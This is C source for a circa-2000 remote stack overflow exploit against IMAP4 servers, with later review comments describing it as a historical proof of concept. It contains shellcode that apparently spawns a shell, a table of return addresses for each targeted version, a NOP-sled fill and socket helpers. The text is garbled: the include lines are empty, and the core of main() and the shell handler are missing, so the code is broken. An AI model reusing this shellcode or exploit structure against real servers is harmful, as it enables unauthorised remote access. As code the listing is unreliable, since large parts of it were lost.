/* Ultimate IMAP4 sploit coded by The Tekneeq Crew */
/* http://www.attrition.org/hosted/tekneeq */

/*
 * NOTE(review): this listing is a historical proof-of-concept for a stack
 * buffer overflow in several IMAP4 server builds (see the `types` table).
 * It is reproduced here for analysis only and is NOT compilable as shown:
 * the page was extracted from HTML and every span between a '<' and a '>'
 * has been lost.  Visible casualties: the seven `#include` lines below have
 * no header names, and the middle of main() (from the `for` loop onward,
 * apparently together with the definition of RunShell()) is missing.
 * Nothing lost here is reconstructed in this review; the comments describe
 * only what the surviving text shows.
 */
#include
#include
#include
#include
#include
#include
#include

/* Byte offset inside overflow_buff at which the saved return address is
 * assumed to sit.  How it is used is in the lost part of main(). */
#define RET_POS 1028

int connect_tcp(struct in_addr addr,unsigned short port);
int fdprintf(int dafd,char *fmt,...);
/* Prototyped only; no definition of RunShell survives on this page. */
void RunShell(int thesock);

/* One entry per targeted server banner: a human-readable version string and
 * the hard-coded stack address to overwrite the return address with. */
struct types { char *name; unsigned long ret_addr; };

/* Version -> return-address table, NULL-terminated.  The addresses are fixed
 * per build, which is why this class of exploit is defeated by stack
 * address randomisation (ASLR) and non-executable stacks: the guessed
 * address no longer lands inside the payload. */
struct types types[]= { {"IMAP4rev1 9.0",0xbffff6e4 }, {"IMAP4rev1 v10.190",0xbffff30f}, {"IMAP4rev1 v10.223",0xbffff6e4}, {"IMAP4rev1 v10.203",0xbffff30f}, {"IMAP4 Service 8.3",0xbffff724}, {NULL,0} };

/* Payload buffer sent to the server; filled with 0x90 in main(). */
char overflow_buff[4096];
/* Target address resolved by host_to_ip() in main(). */
struct in_addr victim;

/* standard shellcode with a few modifications */
/* Opaque machine-code byte string; it is not decoded or documented here. */
char hellcode[]=
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";

/*
 * Entry point.  What survives: argument check, hostname resolution into the
 * global `victim`, and the 0x90 fill of overflow_buff.  A 4096-byte run of
 * 0x90 (x86 NOP) preceding machine code on an IMAP connection is the classic
 * network-IDS signature for this family of attacks; from a defender's side
 * that fill, not the shellcode, is the cheapest thing to alert on.
 *
 * NOTE(review): host_to_ip() is called here before any declaration of it is
 * visible (its definition is at the bottom of the file and it has no
 * prototype above), so this relies on an implicit declaration.  The usage
 * string has probably also lost a "<host>" token to the HTML stripping;
 * the visible text is kept as-is.
 *
 * The text from `i0)` to the final `}` is a fragment: the `for` condition,
 * the rest of main() and (judging by the `thesock` parameter name used by
 * the trailing `write`) the body of RunShell() were stripped with the '<'.
 * It is left byte-for-byte as found and deliberately not repaired.
 */
int main (int argc,char **argv) { unsigned long *ret; char recvbuf[1024]; int sockfd; int i,n=0; if (argc < 2) { printf("Usage: %s [offset]\n",argv[0]); exit(0); } if (!host_to_ip(argv[1],&victim)) { fprintf(stderr,"Hostname lookup failure\n"); exit(0); } memset(overflow_buff,0x90,4096); for (i=RET_POS-(strlen(hellcode));i0) { recvbuf[n]=0; write(thesock,recvbuf,n); } } } }

/*
 * printf-style write to a file descriptor.
 *
 * Formats into a 4096-byte stack buffer with vsnprintf (so the buffer itself
 * cannot overflow; longer output is silently truncated), then writes the
 * NUL-terminated result with write(2).
 *
 * NOTE(review): the return value of write() is ignored (a short write or
 * EPIPE goes unnoticed) and the function always returns 1, so callers get
 * no error signal.  The format string is taken straight from the caller.
 */
int fdprintf(int dafd,char *fmt,...)
{ char mybuffer[4096]; va_list va; va_start(va,fmt); vsnprintf(mybuffer,4096,fmt,va); write(dafd,mybuffer,strlen(mybuffer)); va_end(va); return(1); }

/*
 * Open a TCP connection to addr:port.
 *
 * Returns the connected socket descriptor, or -1 if connect() fails.
 *
 * NOTE(review): the result of socket() is never checked, so a failed socket
 * call passes -1 into connect().  On connect() failure the descriptor is
 * returned as -1 but never closed, leaking it.  `flags` is declared and
 * unused.  `port` is converted with htons(), so callers pass host order.
 */
int connect_tcp(struct in_addr addr,unsigned short port) { struct sockaddr_in serv; int thesock,flags; thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); bzero(&serv,sizeof(serv)); memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr)); serv.sin_port=htons(port); serv.sin_family=AF_INET; if (connect(thesock,(struct sockaddr *)&serv,sizeof(serv)) < 0) return(-1); else return(thesock); }

/*
 * Resolve hostname to an IPv4 address stored in *addr.
 *
 * Returns 1 on success, 0 if gethostbyname() fails.
 *
 * NOTE(review): the copy uses res->h_length rather than sizeof *addr.  For
 * an AF_INET result the two agree (4 bytes); should the resolver ever hand
 * back a longer address family the memcpy would write past *addr.  A
 * `h_length == sizeof *addr` check before the copy would close that.
 * gethostbyname() is also obsolete and not reentrant; getaddrinfo() is the
 * current interface.
 */
int host_to_ip(char *hostname,struct in_addr *addr) { struct hostent *res; res=gethostbyname(hostname); if (res==NULL) return(0); memcpy((char *)addr,res->h_addr,res->h_length); return(1); }

/* www.hack.co.za [2000]*/